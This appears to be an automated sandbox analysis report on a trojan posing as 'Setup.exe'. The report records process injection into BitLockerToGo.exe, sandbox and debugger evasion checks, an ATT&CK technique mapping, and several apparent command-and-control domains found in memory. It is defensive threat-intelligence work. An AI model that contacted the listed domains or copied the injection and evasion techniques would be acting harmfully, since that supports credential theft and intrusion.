    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0040B0F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004320A3
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00411100
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00430120
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004471F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00420233
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004352D0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004252E2
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0042C2EE
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004012F3
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0043C2A0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004452A0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004122B0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0040134E
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00429370
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00408320
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0042D327
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004453F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00444460
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0040D4D0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00415497
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0042B500
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00429500
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00435500
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00423510
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0042D530
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0041A596
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0041C596
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040A5A02_2_0040A5A0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004275B02_2_004275B0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004455B02_2_004455B0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004016022_2_00401602
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004316CE2_2_004316CE
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004037702_2_00403770
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004287702_2_00428770
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004457002_2_00445700
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042E7C22_2_0042E7C2
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004207E02_2_004207E0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004457F02_2_004457F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004448702_2_00444870
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040F8192_2_0040F819
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040D8C02_2_0040D8C0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004078D02_2_004078D0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042C8DA2_2_0042C8DA
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043B9702_2_0043B970
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042F9002_2_0042F900
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042C9312_2_0042C931
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004169822_2_00416982
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004329922_2_00432992
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004469902_2_00446990
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00421A602_2_00421A60
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041FAC92_2_0041FAC9
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042BAF12_2_0042BAF1
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00436A902_2_00436A90
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041BAAE2_2_0041BAAE
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00445B202_2_00445B20
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043BBD02_2_0043BBD0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00411C5B2_2_00411C5B
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040AC602_2_0040AC60
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00427C6E2_2_00427C6E
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040BC002_2_0040BC00
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00422C002_2_00422C00
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043CC172_2_0043CC17
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00423C302_2_00423C30
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00446C302_2_00446C30
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040ED402_2_0040ED40
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00444D602_2_00444D60
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00408D702_2_00408D70
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041BD732_2_0041BD73
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042AD002_2_0042AD00
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00436D002_2_00436D00
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00404E602_2_00404E60
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041EE2E2_2_0041EE2E
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00406ED02_2_00406ED0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00446F002_2_00446F00
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: String function: 0040DF70 appears 198 times
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: String function: 0040C720 appears 70 times
    Source: Setup.exe, 00000000.00000002.2279256146.0000000001E33000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileName vs Setup.exe
    Source: Setup.exe, 00000000.00000002.2279698242.0000000003E98000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs Setup.exe
    Source: Setup.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000000.00000003.2197228069.0000000004100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
    Source: 00000000.00000002.2281733359.0000000004100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
    Source: classification engine | Classification label: mal100.troj.evad.winEXE@3/4@11/9
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0043C754 CoCreateInstance,CoCreateInstance
    Source: C:\Users\user\Desktop\Setup.exe | File created: C:\Users\user\AppData\Local\Temp\jsii-runtime.3122541536
    Source: Setup.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Setup.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: Setup.exe | ReversingLabs: Detection: 15%
    Source: Setup.exe | String found in binary or memory: github.com/aws/jsii-runtime-go@v1.103.1/internal/kernel/load.go
    Source: Setup.exe | String found in binary or memory: github.com/aws/aws-cdk-go/awscdk/v2@v2.162.1/awsec2/LaunchTemplate.go
    Source: Setup.exe | String found in binary or memory: github.com/aws/aws-cdk-go/awscdk/v2@v2.162.1/awsec2/LaunchTemplate__checks.go
    Source: Setup.exe | String found in binary or memory: github.com/aws/aws-cdk-go/awscdk/v2@v2.162.1/awsec2/LaunchTemplateRequireImdsv2Aspect.go
    Source: Setup.exe | String found in binary or memory: github.com/aws/aws-cdk-go/awscdk/v2@v2.162.1/awsec2/LaunchTemplateRequireImdsv2Aspect__checks.go
    Source: Setup.exe | String found in binary or memory: net/addrselect.go
    Source: Setup.exe | String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
    Source: C:\Users\user\Desktop\Setup.exe | File read: C:\Users\user\Desktop\Setup.exe
    Source: unknown | Process created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
    Source: C:\Users\user\Desktop\Setup.exe | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    Source: C:\Users\user\Desktop\Setup.exe | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    Source: C:\Users\user\Desktop\Setup.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\Setup.exe | Section loaded: acgenral.dll
    Source: C:\Users\user\Desktop\Setup.exe | Section loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\Setup.exe | Section loaded: winmm.dll
    Source: C:\Users\user\Desktop\Setup.exe | Section loaded: samcli.dll
    Source: C:\Users\user\Desktop\Setup.exe | Section loaded: msacm32.dll
    Source: C:\Users\user\Desktop\Setup.exe | Section loaded: version.dll
    Source: C:\Users\user\Desktop\Setup.exe | Section loaded: userenv.dll
    Source: C:\Users\user\Desktop\Setup.exe | Section loaded: dwmapi.dll
    Source: C:\Users\user\Desktop\Setup.exe | Section loaded: urlmon.dll
    Source: C:\Users\user\Desktop\Setup.exe | Section loaded: mpr.dll
    Source: C:\Users\user\Desktop\Setup.exe | Section loaded: sspicli.dll
    Source: C:\Users\user\Desktop\Setup.exe | Section loaded: winmmbase.dll
    Source: C:\Users\user\Desktop\Setup.exe | Section loaded: winmmbase.dll
    Source: C:\Users\user\Desktop\Setup.exe | Section loaded: iertutil.dll
    Source: C:\Users\user\Desktop\Setup.exe | Section loaded: srvcli.dll
    Source: C:\Users\user\Desktop\Setup.exe | Section loaded: netutils.dll
    Source: C:\Users\user\Desktop\Setup.exe | Section loaded: powrprof.dll
    Source: C:\Users\user\Desktop\Setup.exe | Section loaded: umpdc.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: winhttp.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: webio.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: mswsock.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: winnsi.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: sspicli.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: rasadhlp.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: fwpuclnt.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: schannel.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: mskeyprotect.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ntasn1.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ncrypt.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ncryptsslp.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: msasn1.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: gpapi.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: dpapi.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: wbemcomn.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: amsi.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: userenv.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: profapi.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: version.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
    Source: Setup.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
    Source: Setup.exe | Static file information: File size 25899008 > 1048576
    Source: Setup.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x9dac00
    Source: Setup.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0xdbd200
    Source: Setup.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: BitLockerToGo.pdb source: Setup.exe, 00000000.00000002.2279698242.0000000003E98000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: BitLockerToGo.pdbGCTL source: Setup.exe, 00000000.00000002.2279698242.0000000003E98000.00000004.00001000.00020000.00000000.sdmp
    Source: Setup.exe | Static PE information: section name: .symtab
    Source: C:\Users\user\Desktop\Setup.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Check user administrative privileges: IsUserAndAdmin, DecisionNode
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 4416 | Thread sleep time: -60000s >= -30000s
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: BitLockerToGo.exe, 00000002.00000003.2338992409.00000000031D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2319556533.00000000031D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
    Source: BitLockerToGo.exe, 00000002.00000002.2400111218.000000000319C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
    Source: Setup.exe, 00000000.00000002.2279367148.0000000001E9A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | API call chain: ExitProcess graph end node
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process queried: DebugPort
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process queried: DebugPort
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process queried: DebugPort
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00443090 LdrInitializeThunk

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Users\user\Desktop\Setup.exe | Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
    Source: C:\Users\user\Desktop\Setup.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
    Source: Setup.exe, 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: drawwyobstacw.sbs
    Source: Setup.exe, 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: condifendteu.sbs
    Source: Setup.exe, 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: ehticsprocw.sbs
    Source: Setup.exe, 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: vennurviot.sbs
    Source: Setup.exe, 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: resinedyw.sbs
    Source: Setup.exe, 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: enlargkiw.sbs
    Source: Setup.exe, 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: allocatinow.sbs
    Source: Setup.exe, 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: mathcucom.sbs
    Source: Setup.exe, 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: divewanntwj.biz
    Source: C:\Users\user\Desktop\Setup.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2DD0008
    Source: C:\Users\user\Desktop\Setup.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
    Source: C:\Users\user\Desktop\Setup.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
    Source: C:\Users\user\Desktop\Setup.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 448000
    Source: C:\Users\user\Desktop\Setup.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 44B000
    Source: C:\Users\user\Desktop\Setup.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 45C000
    Source: C:\Users\user\Desktop\Setup.exe | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    Source: C:\Users\user\Desktop\Setup.exe | Queries volume information: C:\Users\user\Desktop\Setup.exe VolumeInformation
    Source: C:\Users\user\Desktop\Setup.exe | Queries volume information: C:\Windows VolumeInformation
    Source: C:\Users\user\Desktop\Setup.exe | Queries volume information: C:\Windows\AppReadiness VolumeInformation
    Source: C:\Users\user\Desktop\Setup.exe | Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation
    Source: C:\Users\user\Desktop\Setup.exe | Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
    Source: C:\Users\user\Desktop\Setup.exe | Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Stealing of Sensitive Information

    barindex
    Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
    Execution: 1 Windows Management Instrumentation; 2 Command and Scripting Interpreter; 1 Native API; 1 PowerShell; Launchd
    Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
    Privilege Escalation: 311 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script
    Defense Evasion: 2 Virtualization/Sandbox Evasion; 311 Process Injection; 11 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading
    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
    Discovery: 11 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 1 Account Discovery; 22 System Information Discovery; Internet Connection Discovery
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
    Collection: 1 Archive Collected Data; 2 Clipboard Data; Data from Network Shared Drive; Input Capture; Keylogging
    Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
    Source | Detection | Scanner | Label | Link
    Setup.exe | 16% | ReversingLabs | |
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                unknown
                                                                                                                                https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=englBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://json-schema.org/draft-07/schema#program.js.0.drfalse
                                                                                                                                  unknown
                                                                                                                                  http://jsperf.com/1-vs-infinitySetup.exe, 00000000.00000002.2279698242.0000000003E1E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://store.steampowered.com/BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gifBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://allocatinow.sbs/BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQABitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=englishBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://store.steampowered.com/account/cookiepreferences/BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://store.steampowered.com/mobileBitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
